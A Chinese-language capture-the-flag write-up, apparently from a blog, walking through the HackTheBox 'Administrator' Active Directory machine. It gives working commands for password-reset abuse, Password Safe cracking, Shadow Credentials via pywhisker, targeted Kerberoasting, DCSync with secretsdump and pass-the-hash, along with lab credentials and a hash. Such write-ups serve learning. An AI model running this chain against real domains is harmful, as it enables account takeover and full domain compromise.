Before all
Victim’s IP : 10.10.11.42
Victim’s Host : administrator.htb
Attacker’s IP : 10.10.14.10  
Initial Credential: Olivia/ichliebedich
對…我那時候沒看到爆破了快一小時🫠 
  
Recon
老生常談
如果有對這些工具不熟悉就google用法ㄅ~  
port scan
Command
| 1 | rustscan -a 10.10.11.42 --ulimit 5000 -- -sC -sV -Pn | 
Result
| 1 | PORT STATE SERVICE REASON VERSION | 
有開 ftp/smb/ldap/winrpc 和 Microsoft HTTPAPI
初步看來版本號都沒什麼問題  
bloodhound
Command
| 1 | bloodhound-python -c All -u 'Olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip | 
接著neo4j start,bloodhound下下去就可以拖進去看ㄌ  
Exploit
都是用evil-winrm登入
| 1 | evil-winrm -u 'Olivia' -p 'ichliebedich' -i 10.10.11.42 | 
Abusing password reset
現在是Olivia的權限,先看看Outbound Objects有哪些 
  
因為互相有操作權限,有一條reset password的線
Olivia -> Michael (利用GenericAll)  
| 1 | net user michael Whale120 | 
密碼換成Whale120
接下來是 Micahel -> Benjamin (利用ForceChangePassword)
因為 Benjamin 不支援 winrm 等登入介面,只能用 rpc 去改密碼
指令參考:https://malicious.link/posts/2017/reset-ad-user-password-with-linux/
先  
| 1 | rpcclient -U michael //10.10.11.42 | 
進去後:
| 1 | setuserinfo benjamin 23 'Whale120' | 
然後就差點卡住了  
Cracking pwsafe file
還記得剛剛有掃到一個 ftp ,就是用在這邊
Command  
| 1 | ftp administrator.htb | 
帳密就是 benjamin/Whale120
ls只有一個檔案,用get Backup.psafe3抓下來就好ㄌ
file結果:
找到一個叫做pwsafe的工具,apt抓下來~
要密碼QwQ,帶他見見john😎  
| 1 | pwsafe2john Backup.psafe3>hash | 
 
  
選定一個user,點選 Auto Type
就可以拿到密碼了 
  
Shadow Credential
先關注 Emily 相關的權限: 
  
對 Ethan 有 GenericWrite 權限
所謂的 msDS-KeyCredentialLink 就是存取 Windows 上該使用者各種身分驗證的金鑰(不只密碼,還有指紋、pin碼等),然後加密時是拿目標的NTLM HASH。
也就是說,如果寫入了目標的 msDS-KeyCredentialLink 並能獲取返還值,就可以取得 HASH 並嘗試爆破,這種手法就叫 Shadow Credentials
pywhisker
pywhisker可以去建立一個新的金鑰  
| 1 | pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add" | 
 
  
targetedKerberoast.py
接著使用targetedKerberoast.py抓剛剛的SPN
| 1 | sudo ./targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' | 

最後一樣丟john就可以爆破惹  
P.S.
如果撞到KRB_AP_ERR_SKEW(Clock skew too great) Error,代表時間沒對上,要與主機時間對齊:  
| 1 | sudo su | 
其他我就沒遇過什麼問題了(目前)
DCSync and Pass The Hash
Ethan對Administrator有DCSync
 
  
詳細資料可以參考:https://tttang.com/archive/1634/
用 impacket-secretsdump 炸下去~  
| 1 | impacket-secretsdump -just-dc [email protected] | 
 
  
最後針對Admin使用Pass The Hash攻擊:
| 1 | evil-winrm -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e' -i 10.10.11.42 | 
 
  
ROOTED!
After all
有點久沒打那麼多AD,發現有些概念/名詞有點生疏 :zzz:絕對不是在成為Script Kiddie的路上
這篇補了一下XD
https://xz.aliyun.com/t/15718?time__1311=GqjxnQiQEpDsD7Co0%3DGOjG8YF3xYT2ymD#toc-10